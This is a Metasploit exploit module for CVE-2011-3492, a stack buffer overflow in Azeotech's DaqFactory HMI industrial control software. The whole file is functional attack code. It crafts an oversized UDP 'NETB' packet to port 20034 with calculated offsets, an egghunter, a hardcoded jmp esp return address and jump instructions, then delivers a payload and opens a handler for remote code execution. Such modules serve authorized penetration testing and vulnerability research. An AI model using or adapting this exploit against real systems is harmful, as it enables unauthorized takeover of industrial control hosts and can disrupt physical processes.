##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DaqFactory HMI NETB Request Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Azeotech's DaqFactory
        product. The specific vulnerability is triggered when sending a specially crafted
        'NETB' request to port 20034. Exploitation of this vulnerability may take a few
        seconds due to the use of egghunter.  This vulnerability was one of the 14
        releases discovered by researcher Luigi Auriemma.
      },
      'Author'         =>
        [
          'Luigi Auriemma',  # Initial discovery, crash poc
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-3492'],
          [ 'OSVDB', '75496'],
          [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
          [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-264-01.pdf']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
            {
              'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
              'Offset' => 636,
            }
          ],
        ],
      'DisclosureDate' => 'Sep 13 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Required for EIP offset
        OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
        Opt::RPORT(20034)
      ])
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    eggoptions ={
      :checksum => false,
      :eggtag => 'scar',
    }

    # Correct the offset according to the 2nd IP (DHCP) length
    iplen = datastore['DHCP'].length
    offset = 93-iplen

    if offset >= 80
      pktoffset = offset - 80
      finaloffset = target['Offset']-pktoffset
    elsif offset <= 79
      pktoffset = 80 - offset
      finaloffset = target['Offset']+pktoffset
    end

    # springboard onto our unmodified payload
    p = Rex::Arch::X86.jmp(750) + payload.encoded
    hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

    sploit  = "NETB"  # NETB request overflow
    sploit << rand_text_alpha_upper(233)
    sploit << "\x00"  # part of the packet structure
    sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
    sploit << make_nops(2)
    sploit << hunter
    sploit << rand_text_alpha_upper(52-hunter.length-2)
    sploit << [target.ret].pack("V")
    sploit << rand_text_alpha_upper(12)
    sploit << Rex::Arch::X86.jmp_short(-70)
    sploit << egg
    # packetlen needs to be adjusted to a max of 0x400 as per advisory
    sploit << rand_text_alpha_upper(finaloffset-egg.length)

    # The use of rand_text_alpha_upper() ensures we always get the same length for the
    # first IP address.
    sploit[12,4] = rand_text_alpha_upper(4)

    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end
